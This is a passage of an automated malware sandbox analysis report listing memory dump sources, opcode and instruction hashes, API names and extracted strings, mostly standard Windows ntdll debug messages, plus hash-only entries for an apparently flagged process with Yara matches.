                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6aaaa2b9e7ec96bf66e667a99a2840c58e7c934536ef336d09846d431754f4fc
                      • Instruction ID: 77131efb60203ca7e6b38bc0733d67edc95cfa7f8200536a120efcc8b90f26ab
                      • Opcode Fuzzy Hash: 6aaaa2b9e7ec96bf66e667a99a2840c58e7c934536ef336d09846d431754f4fc
                      • Instruction Fuzzy Hash: 7B90023128540402D24171584444606900AA7D0351FD5C022A0424568EC6558B56AB63
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a6c683ea681e09599c872db00df2c776b01ca1831db1514305b88ca75b13fb75
                      • Instruction ID: 44132944ae04d1c496f2d9f0c92c39a9a113d5e4363e47a7f79bb3ee8478a230
                      • Opcode Fuzzy Hash: a6c683ea681e09599c872db00df2c776b01ca1831db1514305b88ca75b13fb75
                      • Instruction Fuzzy Hash: 2D90023124540842D20071584444B46900697E0311F95C026A0124668DC615CA517623
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 529ffaf900eb0e6a10faf8953dbe9441d3d17a8af8cf079f671d2821452c44ec
                      • Instruction ID: 1f2d2861f13114dbde7f5a7b6434e80c435ee7e2e8d7f60e672e288f3c8fff92
                      • Opcode Fuzzy Hash: 529ffaf900eb0e6a10faf8953dbe9441d3d17a8af8cf079f671d2821452c44ec
                      • Instruction Fuzzy Hash: C890023124540403D20071585548707900697D0311F95D421A042456CDD6568A516223
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cf5020042eafff3c343a5900ddb3cedca6eab5885529c9a26ae4d0f7db077488
                      • Instruction ID: 5ae3addc5637d52eb892636e41b73487e3c6178d62221f7219ccd300f674fb56
                      • Opcode Fuzzy Hash: cf5020042eafff3c343a5900ddb3cedca6eab5885529c9a26ae4d0f7db077488
                      • Instruction Fuzzy Hash: 1190022164940402D24071585458706901697D0311F95D021A0024568DC6598B5567A3
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8d33d551dab5b5608956e754c6914bd0b26bb27f4a3cbd0c39b585377309ad28
                      • Instruction ID: a30f4da58c5f1e382c38b566566a2b3b9a4b4e903c35b5a1ad3a9f2490a09d54
                      • Opcode Fuzzy Hash: 8d33d551dab5b5608956e754c6914bd0b26bb27f4a3cbd0c39b585377309ad28
                      • Instruction Fuzzy Hash: C790023124540402D20075985448646900697E0311F95D021A5024569EC6658A916233
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 69b70830a75cde6231ba9d76182fdae28dcda9e13c012c87bbec5e2d7916131d
                      • Instruction ID: 8b8f1c2fafed35a2a14e6b8cdc1618e7457b3a549e6a9ec491c1b09880546754
                      • Opcode Fuzzy Hash: 69b70830a75cde6231ba9d76182fdae28dcda9e13c012c87bbec5e2d7916131d
                      • Instruction Fuzzy Hash: 6890026125540042D20471584444706904697E1311F95C022A2154568CC5298E615227
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                      • API String ID: 48624451-2108815105
                      • Opcode ID: 08171dfc47b51d683078dff7b81dc4da9a8ca70ed3c47d555aed9f505293885e
                      • Instruction ID: c36ed54a1c50f272d8ce9102c9b1608a40863b64ae524cfb324e400637d69a8b
                      • Opcode Fuzzy Hash: 08171dfc47b51d683078dff7b81dc4da9a8ca70ed3c47d555aed9f505293885e
                      • Instruction Fuzzy Hash: 2651E8B5A00116BFDF11DB9C889097EFBB8BB48240B548269F5A5E7646D334DE40CBA0
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                      • API String ID: 48624451-2108815105
                      • Opcode ID: 6417eeacf562209f587dd9ddc14b3a15afb0892d6f045cade1444b59b1f994bf
                      • Instruction ID: 5698160bf4b54df8080d47a94eb3d93264229ccc79995da84207c64c8e45ff63
                      • Opcode Fuzzy Hash: 6417eeacf562209f587dd9ddc14b3a15afb0892d6f045cade1444b59b1f994bf
                      • Instruction Fuzzy Hash: F451F7B1A00645AECB30DF5CC99497FFBFCEB4C200B1484A9E596D7643EAB4EE408760
                      Strings
                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017A4655
                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 017A4787
                      • Execute=1, xrefs: 017A4713
                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017A4742
                      • ExecuteOptions, xrefs: 017A46A0
                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017A46FC
                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017A4725
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                      • API String ID: 0-484625025
                      • Opcode ID: e831eea7a8ab1139ec9a7772bad6206688b8add1e1833c4b1e4306371dc765c6
                      • Instruction ID: e0e2a32de2b374f20e02bd3302117b326bee40e747b4f1d5f6bc2b85d6eca8f6
                      • Opcode Fuzzy Hash: e831eea7a8ab1139ec9a7772bad6206688b8add1e1833c4b1e4306371dc765c6
                      • Instruction Fuzzy Hash: B3513B71600219BAEF25AAA8DC99FEDF7BCEF14348F4401E9DA05AB181E7719E418F50
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: __aulldvrm
                      • String ID: +$-$0$0
                      • API String ID: 1302938615-699404926
                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                      • Instruction ID: 1bb7149d1a0cb93d38ecdca879809e52650bba104c9df50c27eafb636c1206a1
                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                      • Instruction Fuzzy Hash: 6A81F370E452498EEF25CF6CC8907FEFBB1AF85320F18465AE961E7295C7309840CB91
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: %%%u$[$]:%u
                      • API String ID: 48624451-2819853543
                      • Opcode ID: 8ed0f896f47c188ab900f7f3fb57742a0f9d3d842f4b2555b9fbe6a9e3ba2be5
                      • Instruction ID: 20254af916543ff511e6208330d0042110bf8f94ebc7ab42019548e7358be7f2
                      • Opcode Fuzzy Hash: 8ed0f896f47c188ab900f7f3fb57742a0f9d3d842f4b2555b9fbe6a9e3ba2be5
                      • Instruction Fuzzy Hash: 8421517AA00119ABDB11DE7DC848AAEFBEDEF58644F140126E915E3205E730DA058BA1
                      Strings
                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017A02E7
                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017A02BD
                      • RTL: Re-Waiting, xrefs: 017A031E
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                      • API String ID: 0-2474120054
                      • Opcode ID: fec9b82cc3d4fc2513bde08f40f5d940dbcc1d987bf0f1ecc6a4625e52c9ca00
                      • Instruction ID: d41e43376ba3f03d8b9d101faf7e22051bc0e2757e27c2e4c0f805d852c8fb15
                      • Opcode Fuzzy Hash: fec9b82cc3d4fc2513bde08f40f5d940dbcc1d987bf0f1ecc6a4625e52c9ca00
                      • Instruction Fuzzy Hash: 99E1BC306087419FD765CF28C884B6AFBE0FB88314F540A6DF9A58B2E1D7B4E944CB52
                      Strings
                      • RTL: Resource at %p, xrefs: 017A7B8E
                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 017A7B7F
                      • RTL: Re-Waiting, xrefs: 017A7BAC
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                      • API String ID: 0-871070163
                      • Opcode ID: d7119c8843c1ef91a6153afd254a6557f6c8dd6d85eb3c101c23dd010dcead80
                      • Instruction ID: 57f9efc374f229f1e96087e10a56573ce7fcd30ea34db358e54a8b17c989daed
                      • Opcode Fuzzy Hash: d7119c8843c1ef91a6153afd254a6557f6c8dd6d85eb3c101c23dd010dcead80
                      • Instruction Fuzzy Hash: 8341E3713047029FD725DE29CC40BAAF7E9EF99710F100A2DF956DB690DB32E9058B91
                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A728C
                      Strings
                      • RTL: Resource at %p, xrefs: 017A72A3
                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017A7294
                      • RTL: Re-Waiting, xrefs: 017A72C1
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                      • API String ID: 885266447-605551621
                      • Opcode ID: ef2f728a0a4362ff74ab582ef9694eaabde55c8eff55e2bea6e44ae2f753ff3c
                      • Instruction ID: e5c7221d74435754e70b1f76a828d022c359c70bfa21036d32797fb35a05964b
                      • Opcode Fuzzy Hash: ef2f728a0a4362ff74ab582ef9694eaabde55c8eff55e2bea6e44ae2f753ff3c
                      • Instruction Fuzzy Hash: 4F41F031704202ABD725DE29CC41BAAFBB9FB95710F100629FD55EB280DB21F84287D1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: %%%u$]:%u
                      • API String ID: 48624451-3050659472
                      • Opcode ID: ec1ca3065fcf90f0731e8a5b66a270b9cd65154204261415d05b3786a76bfc84
                      • Instruction ID: 60fd25e2c63f144399f9c4e662fcd30ee5bd82674714fdd0ac39bacda7b49c3e
                      • Opcode Fuzzy Hash: ec1ca3065fcf90f0731e8a5b66a270b9cd65154204261415d05b3786a76bfc84
                      • Instruction Fuzzy Hash: 22315472A00219AFDB20DE2DCC44BEEF7FCEB58610F54455AE949E3245EB309A458FA0
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: __aulldvrm
                      • String ID: +$-
                      • API String ID: 1302938615-2137968064
                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                      • Instruction ID: 50e45cf47cb30262fda08364a591631b75d38129fd0e80e2deaa660339a2b138
                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                      • Instruction Fuzzy Hash: 8491E371E002069BEF28CF6DC989ABEFBA5EF44320F54491AE955E72C4E7708981C751
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: $$@
                      • API String ID: 0-1194432280
                      • Opcode ID: cb921bfcf9f4a4b910f4d57c310d82fcf5bd072fce7b9dbcd7d21da6f356f830
                      • Instruction ID: bd230fedec3294854c65c95dbba2adf87ef4f038640cb517fe25e002e0fe0675
                      • Opcode Fuzzy Hash: cb921bfcf9f4a4b910f4d57c310d82fcf5bd072fce7b9dbcd7d21da6f356f830
                      • Instruction Fuzzy Hash: 22811B72D002699BDB31DF54CC45BEEB7B4AB48714F1041DAEA19B7681E7709E84CFA0
                      APIs
                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 017BCFBD
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: CallFilterFunc@8
                      • String ID: @$@4_w@4_w
                      • API String ID: 4062629308-713214301
                      • Opcode ID: fa29a2504c2030e17a14009c9ff48fca776333ef4fe0f393fd9c15be2d016526
                      • Instruction ID: a73438d799a6a6f38e4de533d7fa01d359e0956f42c025574647c7f3f57b4cad
                      • Opcode Fuzzy Hash: fa29a2504c2030e17a14009c9ff48fca776333ef4fe0f393fd9c15be2d016526
                      • Instruction Fuzzy Hash: 0441D071A00225DFCB329FA9C884AADFBB8FF59704F10416AEA14DB258D734D941CB61
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: "$"T8$ T$!$!$"D$#$$!$&B$.$/$/$0$1$2$4!$5$6y$9$=$=h$?S$?g$Ct$D$E$G$H|$K$L$T8$U$V$Yw6$\$^$^$_$a$a{$b$c$h$hc$m$m$m$o$oJ%Gm=h$p$s$w6\?hc$x)${$|$V
                      • API String ID: 0-1125895580
                      • Opcode ID: 4e8ec60641d45dcc04192d9167ee7a77eede532388708df07684020ee12c8cd0
                      • Instruction ID: e215b981b3a93f75ae815e421e8cb1bea634020cc570bd7343257b71faab2b7c
                      • Opcode Fuzzy Hash: 4e8ec60641d45dcc04192d9167ee7a77eede532388708df07684020ee12c8cd0
                      • Instruction Fuzzy Hash: AF827AB0D05229DBEB64CF45C9987DDBBB2BB48308F6481D9C5096B280CBB95EC9DF40
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 6$O$S$\$s
                      • API String ID: 0-3854637164
                      • Opcode ID: 4c4e995badd7e0f077f970ddb03883b6808941c6dc52bed2543d4f0fc7d9eaa2
                      • Instruction ID: d36f37edea2114bb5e53a46a4b2a2ce9a8351c8a2bd86c5922e745bef2c71a4e
                      • Opcode Fuzzy Hash: 4c4e995badd7e0f077f970ddb03883b6808941c6dc52bed2543d4f0fc7d9eaa2
                      • Instruction Fuzzy Hash: 5541A0B2D01219BBDB10EF94EC44FEBB7B8AB4C310F044596EA089A140E775AA54CFE1
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: Kj
                      • API String ID: 0-4281535607
                      • Opcode ID: 0be8a4f901ffff3b9429e14814aa898ac5418f71163d2ef9e52a6cb60662c1a8
                      • Instruction ID: 066be41aeff2fc978b169033011664f3410b1b7fe654c25827123a0345b22a86
                      • Opcode Fuzzy Hash: 0be8a4f901ffff3b9429e14814aa898ac5418f71163d2ef9e52a6cb60662c1a8
                      • Instruction Fuzzy Hash: BB11FEB6D0121CAF9B00DFE9D8409EFB7F9EF88200F14456BE919E7204E7705A158BA1
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: C$
                      • API String ID: 0-2794384104
                      • Opcode ID: e71ccd73a85a9b4e62ffb81ece3b6ab32073cdc606dcfd5133d763ac80ca9af5
                      • Instruction ID: 9d64d32ff82976c8b6f09628d23023c026d0c8cf22cf7e6d79c8d73912d8c1e4
                      • Opcode Fuzzy Hash: e71ccd73a85a9b4e62ffb81ece3b6ab32073cdc606dcfd5133d763ac80ca9af5
                      • Instruction Fuzzy Hash: 751100B6D0121CAF9B00DFE9DC409EEBBF9EF48200F14466BE919E7200E7705A158BA1
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ,
                      • API String ID: 0-3772416878
                      • Opcode ID: 6e1b4dfcab38ef2f93208ee42140161732efa6caaca50b8bcb9ac64ef10ebc1e
                      • Instruction ID: 6de2ec7dab7fa66593d14d06d5f2fd56846ce749cb9a2d25f2f01e12b446aa99
                      • Opcode Fuzzy Hash: 6e1b4dfcab38ef2f93208ee42140161732efa6caaca50b8bcb9ac64ef10ebc1e
                      • Instruction Fuzzy Hash: F501F23782464ACBDB25EF28CC92645F7B8FA49320B690796C9658B081E73091A3C680
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 986924cc058b77783d394b45d5261b59be329e84012c883d46ce305449354130
                      • Instruction ID: 9b5a16a524c485496196b2b36d588434685ba7bb00be736962917689e006c9f8
                      • Opcode Fuzzy Hash: 986924cc058b77783d394b45d5261b59be329e84012c883d46ce305449354130
                      • Instruction Fuzzy Hash: 121186763803057BF720EE559C42FAB776D9B89B20F244155FB04AE1C0D7A5B81146B8
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ae62053ee44264ac1f0be09cc17aa8d12d4808f551bdf620f504cc994602a84d
                      • Instruction ID: 7311e1f41e216fc06132d9bc2bdf882388c55ef2b60bb0cac60fd592535f76d5
                      • Opcode Fuzzy Hash: ae62053ee44264ac1f0be09cc17aa8d12d4808f551bdf620f504cc994602a84d
                      • Instruction Fuzzy Hash: CB2109B5A11308AFDB14DF98DC81FAB77A9AF8D710F10455AFD18A7240D770A911CBA1
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cb951f95a1321cb55f7e4b2fe05b9a40a94abd08ffc05c95b412e57af445523c
                      • Instruction ID: f6bca4773854a9d562c7cc06e002502057bc599668cd3ce37c130db0f5973016
                      • Opcode Fuzzy Hash: cb951f95a1321cb55f7e4b2fe05b9a40a94abd08ffc05c95b412e57af445523c
                      • Instruction Fuzzy Hash: 8011947AA412282BFB15EF64AC45DEF736CDF4D120F140296ED14CB281FB24BA524AE5
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6e162a99e63aba6e948def32f6f6acd7164398199bb30e34bd60a8e167858d12
                      • Instruction ID: 0d8e58897ac60ea84b27d41c75b0fb2a3cc66204e13901e1562740294ae0cbff
                      • Opcode Fuzzy Hash: 6e162a99e63aba6e948def32f6f6acd7164398199bb30e34bd60a8e167858d12
                      • Instruction Fuzzy Hash: 5F115176611708BFEB14EF98DC45FAB73ADEF89700F04455AFD18AB280D770691187A1
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8b19327e72156635c4f8e35f97b1a6d76ab485a27843539c140e0c0ffbf8bec3
                      • Instruction ID: 04eb21270197660ce0a14a469459eca99f504d9d79da830073d8844907854e22
                      • Opcode Fuzzy Hash: 8b19327e72156635c4f8e35f97b1a6d76ab485a27843539c140e0c0ffbf8bec3
                      • Instruction Fuzzy Hash: 3D1191756113087BEB10EBA8DC41FAB77ADEF89200F00455AFD58AB280E7706910C7A1
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c645de62c93a6ff0c5e61469aa2b5a2d495b08286b884989e28a46b387e334de
                      • Instruction ID: dba2589415c5579c60fbfe9865eb6814c3de612ebdfd9cd1ec0d2b208632a16b
                      • Opcode Fuzzy Hash: c645de62c93a6ff0c5e61469aa2b5a2d495b08286b884989e28a46b387e334de
                      • Instruction Fuzzy Hash: CE0180B6214208BBDB48DE99DC80EEB77ADAF8C754F108108BA19E7240D630EC518BA5
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4bec6fd2e798d9e742fc1bb3a050c07a73e739c58d4d88f8c49ca60b4b0af602
                      • Instruction ID: 6b2f2aa6933d22641ce4908706fbae3ef50166fee5fe76754ec3b96506d751fc
                      • Opcode Fuzzy Hash: 4bec6fd2e798d9e742fc1bb3a050c07a73e739c58d4d88f8c49ca60b4b0af602
                      • Instruction Fuzzy Hash: F701A5B6C1121DAFCB40DFE8D9409EEBBF9BB48600F14466AE915F7201F7705A14CBA1
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 60d3e3b4847cd1ffa9cd0482c9e616c90b23bc49deac8cc508f8305733f1604d
                      • Instruction ID: 90817d0e901fae92265b5f680bca704b1eb42b43ca3cb7622a46f0e4c0f8c315
                      • Opcode Fuzzy Hash: 60d3e3b4847cd1ffa9cd0482c9e616c90b23bc49deac8cc508f8305733f1604d
                      • Instruction Fuzzy Hash: E9F0B4776142566BD710AE6DAC40B86F7EDFB49230F190622FE28CA241E772E45686A0
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0d041910f72a58a2d9b9f287290948fd40102a0c9dc23e3f5db101e2fb881644
                      • Instruction ID: 07933a32ba0731acc86965d966c737d89a8d1b2b569860da987b09930654438f
                      • Opcode Fuzzy Hash: 0d041910f72a58a2d9b9f287290948fd40102a0c9dc23e3f5db101e2fb881644
                      • Instruction Fuzzy Hash: B4F01C76204208BBDB10DE99DC81EEB77ADEFC8710F008419FA18E7240D770B9218BB4
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e9f81943950f7be1a9c74d3c12b5a93b01fd8dfa78f72b15e302fd764d19d8b2
                      • Instruction ID: 0276307d207476004bb0db52a7d7b9fcab2a65d29f5b86ab74c7ee06aa0c834f
